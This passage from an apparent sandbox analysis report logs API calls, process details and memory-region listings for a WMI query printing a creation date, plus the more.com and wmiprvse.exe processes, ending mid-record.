[0566.419] memcpy (in: _Dst=0xaefe0, _Src=0x18d9a0, _Size=0x10 | out: _Dst=0xaefe0) returned 0xaefe0
[0566.419] free (_Block=0x38c430)
[0566.420] ??3@YAXPEAX@Z () returned 0x20016c005c0001
[0566.420] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.421] free (_Block=0x18d9a0)
[0566.421] ??3@YAXPEAX@Z () returned 0x45004c000e0001
[0566.421] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.422] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0566.422] free (_Block=0x1886c0)
[0566.422] free (_Block=0x18cee0)
[0566.422] malloc (_Size=0x80) returned 0x18fdc0
[0566.422] memcpy_s (in: _Destination=0x18fdc0, _DestinationSize=0x7e, _Source=0x309088, _SourceSize=0x74 | out: _Destination=0x18fdc0) returned 0x0
[0566.422] malloc (_Size=0x30) returned 0x1886c0
[0566.423] free (_Block=0x1886c0)
[0566.423] malloc (_Size=0x40) returned 0x18fe50
[0566.423] memcpy_s (in: _Destination=0x18fe50, _DestinationSize=0x3e, _Source=0x18fdc0, _SourceSize=0x3a | out: _Destination=0x18fe50) returned 0x0
[0566.423] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="CreationDate \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30
[0566.423] malloc (_Size=0x1e) returned 0x18cee0
[0566.423] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="CreationDate \r\n", cchWideChar=-1, lpMultiByteStr=0x18cee0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreationDate \r\n", lpUsedDefaultChar=0x0) returned 30
[0566.423] fprintf (in: _File=0x7feff772ab0, _Format="%s" | out: _File=0x7feff772ab0) returned 29
[0566.423] fflush (in: _File=0x7feff772ab0 | out: _File=0x7feff772ab0) returned 0
[0566.432] free (_Block=0x18cee0)
[0566.432] free (_Block=0x18fe50)
[0566.432] malloc (_Size=0x40) returned 0x18fe50
[0566.433] memcpy_s (in: _Destination=0x18fe50, _DestinationSize=0x3e, _Source=0x18fdfa, _SourceSize=0x3a | out: _Destination=0x18fe50) returned 0x0
[0566.433] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="20240603113412.436800+120 \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30
[0566.433] malloc (_Size=0x1e) returned 0x18cee0
[0566.433] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="20240603113412.436800+120 \r\n", cchWideChar=-1, lpMultiByteStr=0x18cee0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="20240603113412.436800+120 \r\n", lpUsedDefaultChar=0x0) returned 30
[0566.433] fprintf (in: _File=0x7feff772ab0, _Format="%s" | out: _File=0x7feff772ab0) returned 29
[0566.433] fflush (in: _File=0x7feff772ab0 | out: _File=0x7feff772ab0) returned 0
[0566.433] free (_Block=0x18cee0)
[0566.434] free (_Block=0x18fe50)
[0566.434] malloc (_Size=0x800) returned 0x18efc0
[0566.434] LoadStringW (in: hInstance=0x0, uID=0xafd2, lpBuffer=0x18efc0, cchBufferMax=1024 | out: lpBuffer="\r\n") returned 0x2
[0566.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3
[0566.434] malloc (_Size=0x3) returned 0x187fa0
[0566.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x187fa0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
[0566.434] fprintf (in: _File=0x7feff772ab0, _Format="%s" | out: _File=0x7feff772ab0) returned 2
[0566.434] fflush (in: _File=0x7feff772ab0 | out: _File=0x7feff772ab0) returned 0
[0566.435] free (_Block=0x187fa0)
[0566.435] free (_Block=0x18efc0)
[0566.436] free (_Block=0x18fdc0)
[0566.436] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0566.436] free (_Block=0x189040)
[0566.436] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0566.436] FreeThreadedDOMDocument:IUnknown:Release (This=0x1fd71d0) returned 0x0
[0566.436] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0566.436] free (_Block=0x1896e0)
[0566.436] malloc (_Size=0x18) returned 0x1896e0
[0566.436] free (_Block=0x189740)
[0566.436] malloc (_Size=0x18) returned 0x189740
[0566.436] free (_Block=0x18cce0)
[0566.436] free (_Block=0x189760)
[0566.436] free (_Block=0x189700)
[0566.436] free (_Block=0x1896c0)
[0566.436] free (_Block=0x1896e0)
[0566.436] free (_Block=0x189740)
[0566.437] free (_Block=0x18cbe0)
[0566.437] free (_Block=0x1895c0)
[0566.437] free (_Block=0x188680)
[0566.437] free (_Block=0x18cde0)
[0566.438] free (_Block=0x18ce10)
[0566.438] free (_Block=0x188780)
[0566.438] free (_Block=0x189780)
[0566.438] free (_Block=0x188640)
[0566.438] free (_Block=0x189620)
[0566.438] free (_Block=0x1896a0)
[0566.438] free (_Block=0x18cdc0)
[0566.439] free (_Block=0x186e10)
[0566.439] free (_Block=0x18cd60)
[0566.439] free (_Block=0x18ce30)
[0566.439] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0566.439] free (_Block=0x18cc60)
[0566.439] free (_Block=0x1895e0)
[0566.439] free (_Block=0x189600)
[0566.440] free (_Block=0x18cd10)
[0566.440] free (_Block=0x18cd40)
[0566.440] free (_Block=0x18cd90)
[0566.440] free (_Block=0x187f00)
[0566.441] free (_Block=0x187f50)
[0566.441] free (_Block=0x1865e0)
[0566.441] free (_Block=0x189660)
[0566.441] free (_Block=0x186670)
[0566.441] free (_Block=0x186df0)
[0566.442] free (_Block=0x188080)
[0566.442] free (_Block=0x186dd0)
[0566.442] free (_Block=0x188040)
[0566.442] free (_Block=0x1869b0)
[0566.442] free (_Block=0x188000)
[0566.442] free (_Block=0x186890)
[0566.443] free (_Block=0x1868b0)
[0566.443] free (_Block=0x186830)
[0566.444] free (_Block=0x186850)
[0566.444] free (_Block=0x1868f0)
[0566.444] free (_Block=0x186910)
[0566.444] free (_Block=0x186950)
[0566.444] free (_Block=0x186970)
[0566.445] free (_Block=0x186770)
[0566.445] free (_Block=0x186790)
[0566.445] free (_Block=0x186710)
[0566.445] free (_Block=0x186730)
[0566.445] free (_Block=0x1867d0)
[0566.446] free (_Block=0x1867f0)
[0566.446] free (_Block=0x1866b0)
[0566.446] free (_Block=0x1866d0)
[0566.446] free (_Block=0x186630)
[0566.447] free (_Block=0x37dfa0)
[0566.447] free (_Block=0x18cb50)
[0566.447] WbemObjectTextSrc:IUnknown:Release (This=0x2fc920) returned 0x0
[0566.447] IUnknown:Release (This=0x2fcea0) returned 0x0
[0566.447] WbemLocator:IUnknown:Release (This=0x29cc20) returned 0x2
[0566.447] WbemLocator:IUnknown:Release (This=0x3089a0) returned 0x0
[0566.448] WbemLocator:IUnknown:Release (This=0x308880) returned 0x0
[0566.449] WbemLocator:IUnknown:Release (This=0x29cc20) returned 0x1
[0566.449] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0566.449] WbemLocator:IUnknown:Release (This=0x29cc20) returned 0x0
[0566.449] free (_Block=0x1894e0)
[0566.450] free (_Block=0x189500)
[0566.450] free (_Block=0x188580)
[0566.450] free (_Block=0x189520)
[0566.450] free (_Block=0x189540)
[0566.450] free (_Block=0x1885c0)
[0566.451] free (_Block=0x189360)
[0566.451] free (_Block=0x189380)
[0566.451] free (_Block=0x188400)
[0566.451] free (_Block=0x1893a0)
[0566.451] free (_Block=0x1893c0)
[0566.452] free (_Block=0x188440)
[0566.452] free (_Block=0x1892e0)
[0566.452] free (_Block=0x189300)
[0566.452] free (_Block=0x188380)
[0566.452] free (_Block=0x189320)
[0566.452] free (_Block=0x189340)
[0566.453] free (_Block=0x1883c0)
[0566.453] free (_Block=0x189460)
[0566.453] free (_Block=0x189480)
[0566.453] free (_Block=0x188500)
[0566.453] free (_Block=0x1894a0)
[0566.453] free (_Block=0x1894c0)
[0566.454] free (_Block=0x188540)
[0566.454] free (_Block=0x189260)
[0566.454] free (_Block=0x189280)
[0566.454] free (_Block=0x188300)
[0566.455] free (_Block=0x1892a0)
[0566.455] free (_Block=0x1892c0)
[0566.455] free (_Block=0x188340)
[0566.455] free (_Block=0x1893e0)
[0566.455] free (_Block=0x189400)
[0566.456] free (_Block=0x188480)
[0566.456] free (_Block=0x189420)
[0566.456] free (_Block=0x189440)
[0566.456] free (_Block=0x1884c0)
[0566.457] free (_Block=0x1891a0)
[0566.457] free (_Block=0x1891c0)
[0566.457] free (_Block=0x188240)
[0566.458] free (_Block=0x189060)
[0566.458] free (_Block=0x189080)
[0566.458] free (_Block=0x188100)
[0566.459] free (_Block=0x189000)
[0566.459] free (_Block=0x189020)
[0566.460] free (_Block=0x1880c0)
[0566.460] free (_Block=0x1890e0)
[0566.460] free (_Block=0x189100)
[0566.461] free (_Block=0x188180)
[0566.461] free (_Block=0x1891e0)
[0566.461] free (_Block=0x189200)
[0566.462] free (_Block=0x188280)
[0566.462] free (_Block=0x1890a0)
[0566.462] free (_Block=0x1890c0)
[0566.462] free (_Block=0x188140)
[0566.463] free (_Block=0x189120)
[0566.463] free (_Block=0x189140)
[0566.463] free (_Block=0x1881c0)
[0566.463] free (_Block=0x189160)
[0566.463] free (_Block=0x189180)
[0566.464] free (_Block=0x188200)
[0566.464] free (_Block=0x189220)
[0566.464] free (_Block=0x189240)
[0566.465] free (_Block=0x1882c0)
[0566.465] CoUninitialize ()
[0566.465] DllCanUnloadNow () returned 0x0
[0566.511] free (_Block=0x18e630)
[0566.511] ??3@YAXPEAX@Z () returned 0x740098002e0001
[0566.511] ??3@YAXPEAX@Z () returned 0x45005000050001
[0566.511] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.511] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.513] free (_Block=0x18aa10)
[0566.567] exit (_Code=0)
[0566.568] free (_Block=0x186e60)
[0566.572] free (_Block=0x187db0)
[0566.572] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0566.572] free (_Block=0x186ef0)
[0566.572] free (_Block=0x186690)
[0566.573] free (_Block=0x187d70)
[0566.573] free (_Block=0x187d30)
[0566.574] free (_Block=0x187ce0)
[0566.574] free (_Block=0x187ca0)
[0566.574] free (_Block=0x18ce60)
[0566.575] free (_Block=0x187c40)
[0566.576] free (_Block=0x187bc0)
[0566.576] free (_Block=0x185b20)
[0566.577] free (_Block=0x18ceb0)
[0566.577] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0566.577] free (_Block=0x188600)
Thread:
id = 244
os_tid = 0x44c
Thread:
id = 245
os_tid = 0x218
Thread:
id = 246
os_tid = 0x2bc
Thread:
id = 247
os_tid = 0x29c
Thread:
id = 248
os_tid = 0x188
Process:
id = "33"
image_name = "more.com"
filename = "c:\\windows\\system32\\more.com"
page_root = "0x6787f000"
os_pid = "0x4dc"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "31"
os_parent_pid = "0x740"
cmd_line = "more "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4815
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4816
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4817
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4818
start_va = 0x130000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 4819
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4820
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4821
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4822
start_va = 0xff820000
end_va = 0xff829fff
monitored = 0
entry_point = 0xff82409c
region_type = mapped_file
name = "more.com"
filename = "\\Windows\\System32\\more.com" (normalized: "c:\\windows\\system32\\more.com")
Region:
id = 4823
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4824
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4825
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 4826
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 4827
start_va = 0x1b0000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 4828
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4829
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4830
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4831
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4832
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4833
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 4834
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4841
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4842
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4843
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4844
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4845
start_va = 0x7fef72a0000
end_va = 0x7fef72c7fff
monitored = 0
entry_point = 0x7fef72a1408
region_type = mapped_file
name = "ulib.dll"
filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll")
Region:
id = 4847
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4848
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4849
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4850
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4851
start_va = 0x300000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 4852
start_va = 0x300000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 4853
start_va = 0x450000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 4854
start_va = 0x460000
end_va = 0x5e7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000460000"
filename = ""
Region:
id = 4855
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4856
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4857
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4858
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4859
start_va = 0x5f0000
end_va = 0x770fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005f0000"
filename = ""
Region:
id = 4860
start_va = 0x780000
end_va = 0x1b7ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000780000"
filename = ""
Region:
id = 4862
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 4863
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 4864
start_va = 0xe0000
end_va = 0x117fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ulib.dll.mui"
filename = "\\Windows\\System32\\en-US\\ulib.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ulib.dll.mui")
Thread:
id = 243
os_tid = 0x368
Process:
id = "34"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x4722f000"
os_pid = "0x7e4"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "28"
os_parent_pid = "0x260"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Network Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0002b6b3" [0xc000000f]
Region:
id = 4982
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4983
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4984
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4985
start_va = 0x70000
end_va = 0xeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 4986
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4987
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4988
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4989
start_va = 0x13fd00000
end_va = 0x13fd6bfff
monitored = 0
entry_point = 0x13fd3b450
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 4990
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4991
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4992
start_va = 0x7fffffd7000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4993
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4994
start_va = 0x1c0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 4995
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4996
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4997
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4998
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4999
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 5000
start_va = 0xf0000
end_va = 0x156fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5001
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5002
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5003
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5004
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5005
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5006
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 5007
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 5008
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 5009
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 5010
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 5011
start_va = 0x7fef88c0000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x7fef8938b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 5012
start_va = 0x7fefa260000
end_va = 0x7fefa2d6fff
monitored = 1
entry_point = 0x7fefa29e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 5013
start_va = 0x7fefd5e0000
end_va = 0x7fefd601fff
monitored = 0
entry_point = 0x7fefd5e5d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 5014
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 5015
start_va = 0x7fefdf60000
